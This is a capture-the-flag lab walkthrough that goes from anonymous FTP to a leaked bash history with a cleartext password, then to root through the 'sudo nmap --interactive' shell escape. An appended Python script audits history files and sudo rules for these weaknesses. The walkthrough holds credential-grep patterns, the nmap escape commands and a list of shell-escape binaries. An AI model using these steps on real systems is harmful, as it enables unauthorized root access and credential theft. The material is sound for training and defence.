
Shellcast

Anonymous FTP grants access to a home directory backup where the sysadmin's bash history was accidentally included — and a password was typed in the clear. SSH right in and let sudo nmap hand you root interactively.


Walkthrough

Objective

Recover a cleartext credential from a bash history file via FTP and escalate via sudo nmap.

Phase 1: FTP Enumeration

  1. Connect: ftp TARGET, user anonymous, password blank.
  2. List and download all files: mget *
  3. Grep for passwords: grep -iE 'ssh|pass|su ' .bash_history

Phase 2: Foothold

  1. SSH with the recovered credential.
  2. Capture user flag.

Phase 3: sudo nmap

  1. sudo -l shows (ALL) NOPASSWD: /usr/bin/nmap
  2. Launch interactive mode:
    sudo nmap --interactive
    nmap> !sh
    
  3. Capture root flag.

Tips and Tricks

  • mget * downloads everything — use prompt off first to skip confirmations.
  • Bash history patterns to grep: su , ssh , mysql -p, sshpass.
  • nmap interactive mode works on versions < 5.21; check with nmap --version.
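
A defender-side check for the two weaknesses this walkthrough relies on (the history patterns listed in the tips and the NOPASSWD nmap rule from Phase 3), added here as an example that is not part of the original walkthrough. The function names, the shell-escape binary list, the password-after-command heuristic and the sample data are assumptions constructed for illustration.

```python
import re

# Patterns from the tips above: commands where a secret is often typed inline.
HISTORY_PATTERNS = {
    "sshpass": re.compile(r"\bsshpass\s+-p\s*\S+"),
    "mysql -p": re.compile(r"\bmysql\b.*\s-p\S+"),
    "su": re.compile(r"^\s*su(\s|$)"),
    "ssh": re.compile(r"^\s*ssh\s+\S+"),
}
# Assumption: short, non-exhaustive list of binaries with known shell escapes.
SHELL_ESCAPE_BINARIES = {"nmap", "vim", "less", "find", "awk"}

def audit_history(text):
    """Return (line_no, reason, line) for history lines that need review."""
    findings, lines = [], text.splitlines()
    for i, line in enumerate(lines, start=1):
        hit = next((n for n, p in HISTORY_PATTERNS.items() if p.search(line)), None)
        prev = lines[i - 2] if i > 1 else ""
        after = re.match(r"\s*(su|ssh|sudo)\b", prev)
        # Heuristic (assumption): a lone token that is not all lowercase, typed
        # right after su/ssh/sudo, may be a password entered at the shell prompt.
        if hit is None and after and re.fullmatch(r"(?=\S*[^a-z])\S{6,}", line.strip()):
            hit = "possible password after " + after.group(1)
        if hit:
            findings.append((i, hit, line.strip()))
    return findings

def audit_sudo_l(output):
    """Return NOPASSWD commands in `sudo -l` output that allow a shell escape."""
    risky = []
    for line in output.splitlines():
        m = re.search(r"NOPASSWD:\s*(.+)$", line)
        for cmd in (m.group(1).split(",") if m else []):
            cmd = cmd.strip()
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if cmd == "ALL" or binary in SHELL_ESCAPE_BINARIES:
                risky.append(cmd)
    return risky

# Constructed sample data, not taken from the lab machine.
SAMPLE_HISTORY = "cd /var/backups\nssh admin@192.0.2.10\nExamp1e-Passw0rd\nsshpass -p 'Examp1e' scp a.tgz host:\nls -la\n"
SAMPLE_SUDO_L = "User demo may run the following commands:\n    (ALL) NOPASSWD: /usr/bin/nmap\n"

if __name__ == "__main__":
    for finding in audit_history(SAMPLE_HISTORY):
        print("history:", finding)
    print("sudo:", audit_sudo_l(SAMPLE_SUDO_L))
```

Run it against history files before a home directory backup is placed anywhere readable, and against `sudo -l` output for each account; any finding means the history should be excluded from the backup or the sudoers rule tightened.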
